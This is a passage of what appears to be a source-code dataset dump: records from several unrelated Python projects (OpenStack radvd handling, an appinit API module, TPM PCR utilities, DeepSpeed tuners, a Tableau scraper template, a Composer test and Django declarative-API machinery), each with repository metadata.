self._process_monitor.unregister(uuid=self._router_id,
service_name=RADVD_SERVICE_NAME)
pm = self._get_radvd_process_manager()
pm.disable()
utils.remove_conf_files(cfg.CONF.ra_confs, self._router_id)
LOG.debug("radvd disabled for router %s", self._router_id)
@property
def enabled(self):
return self._get_radvd_process_manager().active
| true | true |
f7233eafe684defd5f01523f95aa2d62f3244d85 | 1,933 | py | Python | appinit_backend/app/lib/system/info.py | app-init/backend | 02bfc059aaa3ba34cb31c2c0cec92391f08826d9 | [
"MIT"
] | 1 | 2020-09-11T01:20:07.000Z | 2020-09-11T01:20:07.000Z | appinit_backend/app/lib/system/info.py | app-init/backend | 02bfc059aaa3ba34cb31c2c0cec92391f08826d9 | [
"MIT"
] | null | null | null | appinit_backend/app/lib/system/info.py | app-init/backend | 02bfc059aaa3ba34cb31c2c0cec92391f08826d9 | [
"MIT"
] | null | null | null | from appinit_backend.lib.imports import *
def call(**kwargs):
    """Return the registered API modules plus selected app-level variables.

    Keyword arguments (mutually exclusive, checked in this order):
        exclude: list of substrings; modules whose name contains any of
            them are filtered out.
        check_permissions: list of the caller's permissions; only modules
            the caller may use are returned, with internal child endpoints
            stripped from permissionless public modules.

    Returns a dict with keys ``modules`` and ``variables``.
    """
    manager = Manager()
    settings = Settings()
    db = manager.db("appinit")

    # Collect every registered module, skipping ".call" endpoint entries.
    # Note: only documents with type == "module" are kept here.
    modules = {}
    for doc in db.apis.find():
        if ".call" not in doc['module'] and doc['type'] == "module":
            del doc['_id']
            modules[doc['module']] = doc

    output = {
        "modules": {}
    }
    if "exclude" in kwargs:
        for excluded in kwargs['exclude']:
            for name, value in modules.items():
                if excluded not in name and value['type'] == "module":
                    output['modules'][name] = value
    elif "check_permissions" in kwargs:
        permissions = kwargs['check_permissions']
        allowed = {}
        for name, value in modules.items():
            # modules only contains type == "module" entries (filtered
            # above); the former dead elif for other types — including a
            # leftover debug print — has been removed.
            if value['type'] != 'module':
                continue
            if len(value['permissions']) > 0:
                # Include the module if the caller holds any required
                # permission.
                for perm in permissions:
                    if perm in value['permissions']:
                        allowed[name] = value
            elif not value['internal']:
                # Public module without explicit permissions: expose it,
                # but strip internal child endpoints first.
                internal_children = [child for child, child_value
                                     in value['child'].items()
                                     if child_value['internal']]
                for child in internal_children:
                    del value['child'][child]
                allowed[name] = value
        output['modules'] = allowed
    else:
        output['modules'] = modules

    # App-level settings exposed to the caller.
    output['variables'] = {}
    app_variable_keys = [
        "smtp",
        "admins",
        "app-title",
        "issue-tracker",
        "issue-tracker-type",
        "reply-to",
        "route-configs"
    ]
    for key in app_variable_keys:
        output['variables'][key] = settings.get_variable(key)
    return output
return output | 27.614286 | 74 | 0.527677 | from appinit_backend.lib.imports import *
def call(**kwargs):
modules = {}
manager = Manager()
settings = Settings()
db = manager.db("appinit")
cursor = db.apis.find()
for i in cursor:
if ".call" not in i['module'] and i['type'] == "module":
del i['_id']
modules[i['module']] = i
exclude = ["call"]
output = {
"modules": {}
}
if "exclude" in kwargs:
for i in kwargs['exclude']:
for key, value in modules.items():
if i not in key and value['type'] == "module":
output['modules'][key] = value
elif "check_permissions" in kwargs:
all_modules = {}
permissions = kwargs['check_permissions']
for module, value in modules.items():
if value['type'] == 'module':
if len(value['permissions']) > 0:
for i in permissions:
if i in value['permissions']:
all_modules[module] = value
elif not value['internal']:
remove_child = []
for child, child_value in value['child'].items():
if child_value['internal']:
remove_child.append(child)
for i in remove_child:
del value['child'][i]
all_modules[module] = value
elif not value['internal'] and len(value['permissions']) == 0:
if module == "release_planning.products.add":
print(value)
all_modules[module] = value
output['modules'] = all_modules
else:
output['modules'] = modules
output['variables'] = {}
app_variable_keys = [
"smtp",
"admins",
"app-title",
"issue-tracker",
"issue-tracker-type",
"reply-to",
"route-configs"
]
for key in app_variable_keys:
output['variables'][key] = settings.get_variable(key)
return output | true | true |
f7233f20d09fe3032a416f972815fc2001641d45 | 1,666 | py | Python | lib/util.py | Foxboron/tpm_futurepcr | 1deebd6cb01854fbcce43a5702870e98e117d276 | [
"MIT"
] | null | null | null | lib/util.py | Foxboron/tpm_futurepcr | 1deebd6cb01854fbcce43a5702870e98e117d276 | [
"MIT"
] | null | null | null | lib/util.py | Foxboron/tpm_futurepcr | 1deebd6cb01854fbcce43a5702870e98e117d276 | [
"MIT"
] | null | null | null | import hashlib
import signify.fingerprinter
import subprocess
NUM_PCRS = 24
PCR_SIZE = hashlib.sha1().digest_size
def to_hex(buf):
    """Return the bytes in *buf* encoded as a lowercase hex string."""
    import binascii
    hex_bytes = binascii.hexlify(buf)
    return hex_bytes.decode()
def hexdump(buf):
    """Print *buf* as a hex dump: offset, 16 hex byte cells, ASCII column."""
    for offset in range(0, len(buf), 16):
        chunk = buf[offset:offset + 16]
        # Pad short final rows so the columns stay aligned.
        hex_cells = ["%02X" % b for b in chunk] + ["  "] * 16
        text_cells = [chr(b) if 0x20 < b < 0x7f else "." for b in chunk] + [" "] * 16
        print("0x%08x:" % offset, " ".join(hex_cells[:16]), "|%s|" % "".join(text_cells[:16]))
def hash_file(path, digest="sha1"):
    """Digest the file at *path* in 4 MiB chunks; return the raw digest bytes."""
    hasher = getattr(hashlib, digest)()
    chunk_size = 4 * 1024 * 1024
    with open(path, "rb") as fh:
        while True:
            chunk = fh.read(chunk_size)
            if not chunk:
                break
            hasher.update(chunk)
    return hasher.digest()
def hash_pecoff(path, digest="sha1"):
    """Return the Authenticode digest of the PE/COFF binary at *path*.

    The Authenticode hash skips the checksum and signature regions of the
    PE image, so it differs from a plain whole-file hash.
    """
    # Fix: the original had an unreachable `return None` after the `with`
    # block's return; it has been removed.
    with open(path, "rb") as fh:
        fpr = signify.fingerprinter.AuthenticodeFingerprinter(fh)
        fpr.add_authenticode_hashers(getattr(hashlib, digest))
        return fpr.hash()[digest]
def init_empty_pcrs():
    """Return a dict of PCR index -> initial value.

    DRTM PCRs (17-22) start as all-0xFF; every other PCR starts as all-0x00.
    """
    drtm_pcrs = {17, 18, 19, 20, 21, 22}
    pcrs = {}
    for idx in range(NUM_PCRS):
        fill = b"\xFF" if idx in drtm_pcrs else b"\x00"
        pcrs[idx] = fill * PCR_SIZE
    return pcrs
def read_current_pcr(idx):
    """Read the current SHA-1 value of PCR *idx* via tpm2_pcrlist (raw bytes)."""
    cmd = ["tpm2_pcrlist", "-L", "sha1:%d" % idx, "-Q", "-o", "/dev/stdout"]
    res = subprocess.run(cmd, stdout=subprocess.PIPE)
    res.check_returncode()
    return res.stdout
def find_mountpoint_by_partuuid(partuuid):
    """Return the first mountpoint of the partition with the given PARTUUID."""
    cmd = ["findmnt", "-S", "PARTUUID=%s" % partuuid, "-o", "TARGET", "-r", "-n"]
    res = subprocess.run(cmd, stdout=subprocess.PIPE)
    res.check_returncode()
    first_line = res.stdout.splitlines()[0]
    return first_line.decode()
| 31.433962 | 97 | 0.581032 | import hashlib
import signify.fingerprinter
import subprocess
NUM_PCRS = 24
PCR_SIZE = hashlib.sha1().digest_size
def to_hex(buf):
import binascii
return binascii.hexlify(buf).decode()
def hexdump(buf):
for i in range(0, len(buf), 16):
row = buf[i:i+16]
offs = "0x%08x:" % i
hexs = ["%02X" % b for b in row] + [" "] * 16
text = [chr(b) if 0x20 < b < 0x7f else "." for b in row] + [" "] * 16
print(offs, " ".join(hexs[:16]), "|%s|" % "".join(text[:16]))
def hash_file(path, digest="sha1"):
h = getattr(hashlib, digest)()
with open(path, "rb") as fh:
buf = True
buf_size = 4 * 1024 * 1024
while buf:
buf = fh.read(buf_size)
h.update(buf)
return h.digest()
def hash_pecoff(path, digest="sha1"):
with open(path, "rb") as fh:
fpr = signify.fingerprinter.AuthenticodeFingerprinter(fh)
fpr.add_authenticode_hashers(getattr(hashlib, digest))
return fpr.hash()[digest]
return None
def init_empty_pcrs():
pcrs = {x: (b"\xFF" if x in {17, 18, 19, 20, 21, 22} else b"\x00") * PCR_SIZE
for x in range(NUM_PCRS)}
return pcrs
def read_current_pcr(idx):
res = subprocess.run(["tpm2_pcrlist", "-L", "sha1:%d" % idx, "-Q", "-o", "/dev/stdout"],
stdout=subprocess.PIPE)
res.check_returncode()
return res.stdout
def find_mountpoint_by_partuuid(partuuid):
res = subprocess.run(["findmnt", "-S", "PARTUUID=%s" % partuuid, "-o", "TARGET", "-r", "-n"],
stdout=subprocess.PIPE)
res.check_returncode()
return res.stdout.splitlines()[0].decode()
| true | true |
f7233f2e8d752d094729ad3663daedf3710a1f26 | 1,096 | py | Python | deepspeed/autotuning/tuner/index_based_tuner.py | ganik/DeepSpeed | 788e1c40e83beacfc4901e7daa1e097d2efb82bb | [
"MIT"
] | 2 | 2021-03-17T12:00:32.000Z | 2021-03-17T12:18:30.000Z | deepspeed/autotuning/tuner/index_based_tuner.py | ganik/DeepSpeed | 788e1c40e83beacfc4901e7daa1e097d2efb82bb | [
"MIT"
] | 30 | 2020-05-05T01:04:46.000Z | 2022-03-18T18:12:10.000Z | deepspeed/autotuning/tuner/index_based_tuner.py | ganik/DeepSpeed | 788e1c40e83beacfc4901e7daa1e097d2efb82bb | [
"MIT"
] | 3 | 2021-07-19T14:05:01.000Z | 2022-01-31T10:24:35.000Z | import random
from deepspeed.utils import logger
from .base_tuner import BaseTuner
class RandomTuner(BaseTuner):
    """Explore the search space in random order"""
    def __init__(self, exps: list, resource_manager, metric):
        super().__init__(exps, resource_manager, metric)

    def next_batch(self, sample_size=1):
        """Remove and return up to *sample_size* experiments chosen at random."""
        count = min(sample_size, len(self.all_exps))
        batch = random.sample(self.all_exps, count)
        self.all_exps = [exp for exp in self.all_exps if exp not in batch]
        return batch
class GridSearchTuner(BaseTuner):
    """Explore the search space in sequential order"""
    def __init__(self, exps: list, resource_manager, metric):
        super().__init__(exps, resource_manager, metric)

    def next_batch(self, sample_size=1):
        """Remove and return the next up-to-*sample_size* experiments in order."""
        count = min(sample_size, len(self.all_exps))
        batch = self.all_exps[0:count]
        self.all_exps = [exp for exp in self.all_exps if exp not in batch]
        return batch
| 30.444444 | 76 | 0.691606 | import random
from deepspeed.utils import logger
from .base_tuner import BaseTuner
class RandomTuner(BaseTuner):
def __init__(self, exps: list, resource_manager, metric):
super().__init__(exps, resource_manager, metric)
def next_batch(self, sample_size=1):
if sample_size > len(self.all_exps):
sample_size = len(self.all_exps)
sampled_batch = random.sample(self.all_exps, sample_size)
self.all_exps = [x for x in self.all_exps if x not in sampled_batch]
return sampled_batch
class GridSearchTuner(BaseTuner):
def __init__(self, exps: list, resource_manager, metric):
super().__init__(exps, resource_manager, metric)
def next_batch(self, sample_size=1):
if sample_size > len(self.all_exps):
sample_size = len(self.all_exps)
sampled_batch = self.all_exps[0:sample_size]
self.all_exps = [x for x in self.all_exps if x not in sampled_batch]
return sampled_batch
| true | true |
f7233f54be53aebd46001e1c935dd5fbe4d82ab8 | 687 | py | Python | helpers/templates/tableau.py | kxdan/can-scrapers | a0641976ce59e710cec30f065276a4ddd804e9b3 | [
"MIT"
] | 7 | 2020-11-11T14:47:46.000Z | 2021-12-28T02:21:41.000Z | helpers/templates/tableau.py | kxdan/can-scrapers | a0641976ce59e710cec30f065276a4ddd804e9b3 | [
"MIT"
] | 176 | 2020-11-13T00:32:44.000Z | 2022-02-17T01:32:30.000Z | helpers/templates/tableau.py | kxdan/can-scrapers | a0641976ce59e710cec30f065276a4ddd804e9b3 | [
"MIT"
] | 13 | 2020-11-14T19:25:34.000Z | 2021-04-04T22:32:07.000Z | import pandas as pd
import us
from can_tools.scrapers.base import CMU
from can_tools.scrapers.official.base import TableauDashboard
class {{ scraper.name }}(TableauDashboard):
    """County-level Tableau dashboard scraper for {{ scraper.state_name }}.

    NOTE: this is a Jinja template; ``{{ ... }}`` placeholders are filled
    in when a concrete scraper is generated.
    """

    # Rows are keyed by county name, not by numeric location (FIPS) codes.
    has_location = False
    source = "{{ scraper.source }}"
    source_name = "{{ scraper.source_name }}"
    state_fips = int(us.states.lookup("{{ scraper.state_name }}").fips)
    location_type = "county"
    # Tableau workbook location: base URL plus the view path within it.
    baseurl = "{{ scraper.baseurl }}"
    viewPath = "{{ scraper.viewPath }}"

    # Worksheet to extract and the column holding the county name.
    data_tableau_table = "{{ scraper.data_tableau_table }}"
    location_name_col = "{{ scraper.location_name_col }}"
    timezone = "{{ scraper.timezone }}"

    # map wide form column names into CMUs
    cmus = {
        # TODO: populate with {"<source column>": CMU(...)} entries.
    }
| 28.625 | 71 | 0.672489 | import pandas as pd
import us
from can_tools.scrapers.base import CMU
from can_tools.scrapers.official.base import TableauDashboard
class {{ scraper.name }}(TableauDashboard):
    """County-level Tableau dashboard scraper for {{ scraper.state_name }}.

    NOTE: this is a Jinja template; ``{{ ... }}`` placeholders are filled
    in when a concrete scraper is generated.
    """

    # Rows are keyed by county name, not by numeric location (FIPS) codes.
    has_location = False
    source = "{{ scraper.source }}"
    source_name = "{{ scraper.source_name }}"
    state_fips = int(us.states.lookup("{{ scraper.state_name }}").fips)
    location_type = "county"
    # Tableau workbook location: base URL plus the view path within it.
    baseurl = "{{ scraper.baseurl }}"
    viewPath = "{{ scraper.viewPath }}"
    # Worksheet to extract and the column holding the county name.
    data_tableau_table = "{{ scraper.data_tableau_table }}"
    location_name_col = "{{ scraper.location_name_col }}"
    timezone = "{{ scraper.timezone }}"
    # Wide-form source columns are mapped into CMUs here.
    cmus = {
        # TODO: populate with {"<source column>": CMU(...)} entries.
    }
| false | true |
f723405bc13d056885407776297cf576268d77cf | 1,714 | py | Python | tests/callbacks/test_speed_monitor.py | jbloxham/composer | 6dd0a0f297cafb404333d6280a5344bcb7f3bee6 | [
"Apache-2.0"
] | null | null | null | tests/callbacks/test_speed_monitor.py | jbloxham/composer | 6dd0a0f297cafb404333d6280a5344bcb7f3bee6 | [
"Apache-2.0"
] | null | null | null | tests/callbacks/test_speed_monitor.py | jbloxham/composer | 6dd0a0f297cafb404333d6280a5344bcb7f3bee6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 MosaicML. All Rights Reserved.
import collections.abc
from unittest.mock import MagicMock
import pytest
from composer.callbacks import SpeedMonitorHparams
from composer.trainer import TrainerHparams
@pytest.mark.timeout(60)
@pytest.mark.run_long
def test_speed_monitor(mosaic_trainer_hparams: TrainerHparams):
    """Train briefly with a SpeedMonitor attached and verify the expected
    number of throughput / wall-clock metric emissions."""
    window_size = 2
    mosaic_trainer_hparams.callbacks.append(SpeedMonitorHparams(window_size=window_size))
    mosaic_trainer_hparams.grad_accum = 1
    mosaic_trainer_hparams.ddp.fork_rank_0 = False
    mosaic_trainer_hparams.total_batch_size = 10
    mosaic_trainer_hparams.max_epochs = 2
    trainer = mosaic_trainer_hparams.initialize_object()

    # Capture every logged metric through a mock backend that accepts all logs.
    log_destination = MagicMock()
    log_destination.will_log.return_value = True
    trainer.logger.backends = [log_destination]
    trainer.fit()

    # Tally how many times each speed metric appeared across log_metric calls.
    counts = {"throughput/step": 0, "throughput/epoch": 0, "wall_clock_train": 0}
    for logged_call in log_destination.log_metric.mock_calls:
        metrics = logged_call[1][3]
        for metric_name in counts:
            if metric_name in metrics:
                counts[metric_name] += 1

    assert isinstance(trainer.state.train_dataloader, collections.abc.Sized)
    # throughput/step is only logged once the rolling window is full.
    steps_per_epoch = len(trainer.state.train_dataloader)
    expected_step_calls = (steps_per_epoch - window_size) * mosaic_trainer_hparams.max_epochs
    assert counts["throughput/step"] == expected_step_calls
    assert counts["throughput/epoch"] == mosaic_trainer_hparams.max_epochs
    assert counts["wall_clock_train"] == mosaic_trainer_hparams.max_epochs
| 38.088889 | 97 | 0.763127 |
import collections.abc
from unittest.mock import MagicMock
import pytest
from composer.callbacks import SpeedMonitorHparams
from composer.trainer import TrainerHparams
@pytest.mark.timeout(60)
@pytest.mark.run_long
def test_speed_monitor(mosaic_trainer_hparams: TrainerHparams):
    """End-to-end check that SpeedMonitor logs throughput/wall-clock metrics.

    Runs a short 2-epoch training with a mocked logger backend, then counts
    how many times each speed metric was emitted.
    """
    speed_monitor_hparams = SpeedMonitorHparams(window_size=2)
    mosaic_trainer_hparams.callbacks.append(speed_monitor_hparams)
    mosaic_trainer_hparams.grad_accum = 1
    mosaic_trainer_hparams.ddp.fork_rank_0 = False
    mosaic_trainer_hparams.total_batch_size = 10
    mosaic_trainer_hparams.max_epochs = 2
    trainer = mosaic_trainer_hparams.initialize_object()
    # Replace the logging backends with a mock that accepts every log call.
    log_destination = MagicMock()
    log_destination.will_log.return_value = True
    trainer.logger.backends = [log_destination]
    trainer.fit()
    # Count emissions of each speed metric across all log_metric calls.
    throughput_epoch_calls = 0
    wall_clock_train_calls = 0
    throughput_step_calls = 0
    for call_ in log_destination.log_metric.mock_calls:
        metrics = call_[1][3]  # 4th positional argument: the metrics mapping
        if "throughput/step" in metrics:
            throughput_step_calls += 1
        if "throughput/epoch" in metrics:
            throughput_epoch_calls += 1
        if 'wall_clock_train' in metrics:
            wall_clock_train_calls += 1
    assert isinstance(trainer.state.train_dataloader, collections.abc.Sized)
    # throughput/step is only logged once the rolling window is full.
    expected_step_calls = (len(trainer.state.train_dataloader) -
                           speed_monitor_hparams.window_size) * mosaic_trainer_hparams.max_epochs
    assert throughput_step_calls == expected_step_calls
    assert throughput_epoch_calls == mosaic_trainer_hparams.max_epochs
    assert wall_clock_train_calls == mosaic_trainer_hparams.max_epochs
| true | true |
f723407cb697035f3ca80b669f150c10433bf6ae | 23,022 | py | Python | django_declarative_apis/machinery/__init__.py | demianbrecht/django-declarative-apis | 5d8d5bbf1cdaedd9f823c1a359bc73fb99d6a9b7 | [
"BSD-3-Clause"
] | null | null | null | django_declarative_apis/machinery/__init__.py | demianbrecht/django-declarative-apis | 5d8d5bbf1cdaedd9f823c1a359bc73fb99d6a9b7 | [
"BSD-3-Clause"
] | null | null | null | django_declarative_apis/machinery/__init__.py | demianbrecht/django-declarative-apis | 5d8d5bbf1cdaedd9f823c1a359bc73fb99d6a9b7 | [
"BSD-3-Clause"
] | null | null | null | #
# Copyright (c) 2019, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
import abc
import http.client
import itertools
import logging
import sys
import django
from django.conf import settings
from django.db import models
from django.http import HttpResponse
from django_declarative_apis.machinery.filtering import apply_filters_to_object
from django_declarative_apis.models import BaseConsumer
from django_declarative_apis.resources.utils import HttpStatusCode
from . import errors
from .attributes import (
Aggregate,
ConsumerAttribute,
DeferrableEndpointTask,
EndpointAttribute,
EndpointTask,
RawRequestObjectProperty,
RequestAdhocQuerySet,
RequestAttribute,
RequestField,
RequestProperty,
RequestUrlField,
RequireAllAttribute,
RequireAllIfAnyAttribute,
RequireOneAttribute,
ResourceField,
)
# these imports are unusued in this file but may be used in other projects
# that use `machinery` as an interface
from .attributes import TypedEndpointAttributeMixin, RequestFieldGroup # noqa
from .utils import locate_object, rate_limit_exceeded
logger = logging.getLogger(__name__)
# TODO:
# * Make it generically handle database write failures (updating the http_status to be 5XX)
# * Create new error for deadline exceeded and catch it in the same place as writes
# * Make deferred tasks actually run deferred
class EndpointResourceAttribute(EndpointAttribute):
    """Decorator attribute that resolves the endpoint's primary resource.

    Usage::

        @endpoint_resource(type=MyModel)
        def resource(self): ...

    The wrapped getter is called with the endpoint instance; an
    ``ObjectDoesNotExist`` raised by it is translated into a 404 client
    error naming ``type``.
    """

    def __init__(self, type, filter=None, returns_list=False, **kwargs):
        """
        :param type: model class the getter returns (used in the 404 message)
        :param filter: optional response filter attached to the resolved value
        :param returns_list: whether the getter yields a collection
        """
        super().__init__(**kwargs)
        self.type = type
        self.filter = filter
        self.func = None
        self.returns_list = returns_list

    def __call__(self, func):
        # Decorator form: capture the resource getter and return the
        # descriptor so the attribute machinery keeps working.
        self.func = func
        return self

    def get_instance_value(self, owner_instance, owner_class):
        if not owner_instance:
            # Class-level access yields the descriptor itself.
            return self
        try:
            value = self.func(owner_instance)
        except django.core.exceptions.ObjectDoesNotExist:
            raise errors.ClientErrorNotFound(
                "{0} instance not found".format(self.type.__name__)
            )
        # Plain dict responses pass through unfiltered (idiomatic exact-type
        # check instead of the previous `value.__class__ == dict`).
        if type(value) is dict:
            return value
        if not getattr(value, "_api_filter", False):
            value._api_filter = self.filter
        return value
class EndpointResponseAttribute(EndpointAttribute):
    """Decorator attribute that produces the endpoint's response payload.

    Wraps a getter function; when the endpoint instance accesses the
    attribute, the getter runs and an optional response filter is attached
    to the result.
    """

    def __init__(self, type, filter=None, **kwargs):
        super(EndpointResponseAttribute, self).__init__(**kwargs)
        self.type = type
        self.filter = filter
        self.func = None

    def __call__(self, func):
        # Decorator form: remember the getter, keep returning the descriptor.
        self.func = func
        return self

    def get_instance_value(self, owner_instance, owner_class):
        if not owner_instance:
            return self
        value = self.func(owner_instance)
        already_filtered = getattr(value, "_api_filter", False)
        # Only attach a filter when one was configured and none is present.
        if self.filter and not already_filtered:
            value._api_filter = self.filter
        return value
class EndpointDefinitionMeta(abc.ABCMeta, metaclass=abc.ABCMeta):
    """Metaclass that back-fills ``name`` on declared endpoint attributes.

    Endpoint attribute descriptors may be declared without an explicit
    name; this assigns the class-body attribute name, walking the MRO so
    attributes defined on parent classes are covered too.
    """

    def __init__(cls, class_name, bases=None, dict=None):
        super(EndpointDefinitionMeta, cls).__init__(class_name, bases, dict)

        # This metaclass sets EndpointAttribute descriptors' names if they
        # haven't otherwise been set.
        # This will walk parent classes as well so that attributes can be
        # defined through inheritance.
        ancestor_attribs = (ancestor.__dict__.items() for ancestor in cls.mro())
        for name, attribute in itertools.chain(dict.items(), *ancestor_attribs):
            try:
                if not attribute.name:
                    attribute.name = name
            except AttributeError as e:  # noqa
                # Non-descriptor members (methods, plain values) have no
                # ``.name`` — skip them.
                pass
class EndpointBinder(object):
    """Binds an endpoint definition class to incoming HTTP requests.

    Collects the definition's declared attributes/fields/tasks once at
    construction, then produces a ``BoundEndpointManager`` per request
    that resolves request properties, runs validation, executes tasks and
    renders the response.
    """

    class BoundEndpointManager(object):
        """Wraps one bound endpoint instance for a single request."""

        def __init__(self, manager, bound_endpoint):
            self.manager = manager
            self.bound_endpoint = bound_endpoint
            # sys.exc_info() tuples captured during binding/validation;
            # re-raised lazily by get_response().
            self.binding_exc_info = None
            self.validation_exc_info = None

        def get_response(self):
            """Run endpoint tasks and return ``(status_code, payload)``.

            Re-raises any error captured while binding or validating,
            persists dirty resources around task execution, then applies
            the response filter to the endpoint's response data.
            """
            error = self.binding_exc_info or self.validation_exc_info
            if error:
                exc_type, exc_value, exc_traceback = error
                if isinstance(exc_value, errors.ClientError):
                    logger.warning(exc_value.error_message)
                else:
                    logger.error(str(exc_value.args) + "\n" + str(exc_traceback))
                raise exc_value.with_traceback(exc_traceback)
            resource = self.bound_endpoint.resource
            # Persist changes made during binding before any task runs.
            if hasattr(resource, "is_dirty"):
                if resource and resource.is_dirty(check_relationship=True):
                    resource.save()
            endpoint_tasks = sorted(
                self.manager.endpoint_tasks, key=lambda t: t.priority
            )
            immediate_tasks = filter(
                lambda t: not isinstance(t, DeferrableEndpointTask), endpoint_tasks
            )
            deferred_tasks = filter(
                lambda t: isinstance(t, DeferrableEndpointTask), endpoint_tasks
            )
            try:
                for immediate_task in immediate_tasks:
                    immediate_task.run(self.bound_endpoint)
            except errors.ClientError as ce:
                # Some client errors still want partial changes persisted.
                if ce.save_changes and resource and resource.is_dirty():
                    resource.save()
                raise
            # Save again: immediate tasks may have mutated the resource.
            if hasattr(resource, "is_dirty"):
                if resource and resource.is_dirty(check_relationship=True):
                    resource.save()
            for deferred_task in deferred_tasks:
                deferred_task.run(self.bound_endpoint)
            # A filter attached to the resource wins over the endpoint default.
            if getattr(resource, "_api_filter", False):
                filter_def = resource._api_filter
            else:
                filter_def = self.bound_endpoint.response_filter
            data = self.bound_endpoint.response
            status_code = self.bound_endpoint.http_status
            if isinstance(data, HttpResponse):
                if 200 <= status_code <= 299:
                    return status_code, data
                else:
                    raise HttpStatusCode(data)
            elif isinstance(data, dict):
                # Filter each element of list-like values; pass scalars through.
                result = {}
                for key, value in data.items():
                    if isinstance(value, (list, tuple, models.query.QuerySet)):
                        result[key] = []
                        for item in value:
                            result[key].append(
                                apply_filters_to_object(item, filter_def)
                            )
                    else:
                        result[key] = value
                return status_code, result
            else:
                return (
                    status_code,
                    apply_filters_to_object(
                        data,
                        filter_def,
                        self.bound_endpoint.request.META.get("HTTP_X_EXPAND"),
                    ),
                )

    def __init__(self, endpoint_definition):
        super(EndpointBinder, self).__init__()
        self.endpoint_definition = endpoint_definition
        # Cache the definition's declared metadata once per binder.
        self.endpoint_attributes = endpoint_definition.get_endpoint_attributes()
        self.request_properties = endpoint_definition.get_request_properties()
        self.required_request_properties = (
            endpoint_definition.get_required_request_properties()
        )
        try:
            self.consumer_attributes = endpoint_definition.get_consumer_attributes()
        except AttributeError:
            # Definitions without consumer support simply have none.
            self.consumer_attributes = []
        self.request_fields = endpoint_definition.get_request_fields()
        self.required_request_fields = endpoint_definition.get_required_request_fields()
        self.endpoint_tasks = endpoint_definition.get_tasks()
        self.url_fields = endpoint_definition.get_url_fields()
        self.adhoc_queries = endpoint_definition.get_adhoc_queries()

    def create_bound_endpoint(self, manager, request, *args, **kwargs):
        """Instantiate the endpoint and bind URL/query/request data onto it."""
        endpoint = self.endpoint_definition()
        for url_field in self.url_fields:
            if (url_field.api_name or url_field.name) in kwargs:
                url_field.set_value(kwargs.get(url_field.api_name or url_field.name))
        for adhoc_query_field in self.adhoc_queries:
            adhoc_query_field.set_value(
                {
                    key: val
                    for (key, val) in request.GET.items()
                    if key.startswith(adhoc_query_field.name)
                }
            )
        # Bind the request object within the instance (this allows
        # RequestProperties to access the request without the endpoint
        # definition having direct access to it)
        RequestProperty.bind_request_to_instance(endpoint, request)
        bound_endpoint_manager = EndpointBinder.BoundEndpointManager(manager, endpoint)
        # Binding/validation errors are captured rather than raised so the
        # caller can fall back to other endpoint definitions (behavioral
        # routing); get_response() re-raises them.
        try:
            self._bind_endpoint(endpoint)
        except Exception as e:  # noqa
            bound_endpoint_manager.binding_exc_info = sys.exc_info()
            return bound_endpoint_manager
        try:
            self._validate_endpoint(endpoint)
        except Exception as e:  # noqa
            bound_endpoint_manager.validation_exc_info = sys.exc_info()
        return bound_endpoint_manager

    def _bind_endpoint(self, endpoint):
        # Access all request properties (this validates a request using the
        # definition and caches the values)
        extra_error_message = ""
        missing_required_properties = []
        invalid_value_properties = []
        for request_property in self.request_properties:
            try:
                value = getattr(endpoint, request_property.name)
                if value is None and request_property.required:
                    if isinstance(request_property, ConsumerAttribute):
                        # A missing required consumer attribute should fail quickly as forbidden
                        raise errors.ClientErrorForbidden()
                    else:
                        # Otherwise collect missing properties and report them all together
                        missing_required_properties.append(request_property)
            except errors.ClientErrorMissingFields as mfe:  # TODO: seems unreachable
                extra_error_message += mfe.error_message  # pragma: nocover
            except (ValueError, errors.ClientErrorInvalidFieldValues) as ve:  # noqa
                # Collect invalid values and report them all together
                invalid_value_properties.append(request_property)  # pragma: nocover

        if missing_required_properties or extra_error_message:
            raise errors.ClientErrorMissingFields(
                [property.name for property in missing_required_properties],
                extra_message=extra_error_message,
            )
        if invalid_value_properties:
            raise errors.ClientErrorInvalidFieldValues(
                [request_property.name for request_property in invalid_value_properties]
            )

    def _validate_endpoint(self, endpoint):
        # Run standard validators
        try:
            if not (
                endpoint.is_authorized()
                and endpoint.is_permitted()
                and endpoint.is_valid()
            ):
                raise errors.ClientErrorForbidden(
                    additional_info=getattr(endpoint, "_validation_error_message", None)
                )
        except django.core.exceptions.ObjectDoesNotExist:
            raise errors.ClientErrorNotFound()

        # check ratelimit
        rate_limit_key = endpoint.rate_limit_key()
        if (rate_limit_key is not None) and rate_limit_exceeded(
            rate_limit_key, endpoint.rate_limit_period()
        ):
            raise errors.ClientErrorRequestThrottled()
class _EndpointRequestLifecycleManager(object):
    """Drives a single endpoint definition through bind -> execute -> respond."""

    def __init__(self, endpoint_definition):
        super().__init__()
        self.endpoint_definition = endpoint_definition
        self.binder = EndpointBinder(endpoint_definition)
        self.endpoint_tasks = endpoint_definition.get_tasks()

    def bind_endpoint_to_request(self, request, *args, **kwargs):
        """Bind the definition to one request; returns a BoundEndpointManager."""
        return self.binder.create_bound_endpoint(self, request, *args, **kwargs)

    def process_request_and_get_response(self, request, *args, **kwargs):
        """Bind and execute the endpoint, returning ``(status_code, payload)``."""
        bound = self.bind_endpoint_to_request(request, *args, **kwargs)
        return bound.get_response()

    def __str__(self):  # pragma: nocover
        return self.endpoint_definition.__name__
class BehavioralEndpointDefinitionRouter(object):
    """Routes one URL to the first endpoint definition that binds cleanly."""

    def __init__(self, *endpoint_definitions):
        super().__init__()
        self.endpoint_definitions = endpoint_definitions
        self.endpoint_managers = [
            _EndpointRequestLifecycleManager(definition)
            for definition in endpoint_definitions
        ]
        # Human-readable "(NameA,NameB)" label used by __str__.
        joined_names = ",".join(definition.__name__ for definition in endpoint_definitions)
        self.endpoint_manager_names = "({0})".format(joined_names)

    def bind_endpoint_to_request(self, request, *args, **kwargs):
        """Try each candidate in declaration order; keep the first that binds
        without error. If all fail, the last candidate's bound manager (with
        its captured binding error) is returned."""
        bound = None
        for candidate in self.endpoint_managers:
            bound = candidate.bind_endpoint_to_request(request, *args, **kwargs)
            if bound.binding_exc_info is None:
                break
        return bound

    def process_request_and_get_response(self, request, *args, **kwargs):
        """Dispatch the request and return ``(status_code, payload)``."""
        try:
            bound = self.bind_endpoint_to_request(request, *args, **kwargs)
            logger.info(
                "Processing request with handler %s",
                bound.bound_endpoint.__class__.__name__,
            )
            return bound.get_response()
        except errors.ApiError:
            # API errors already carry their HTTP semantics; propagate as-is.
            raise
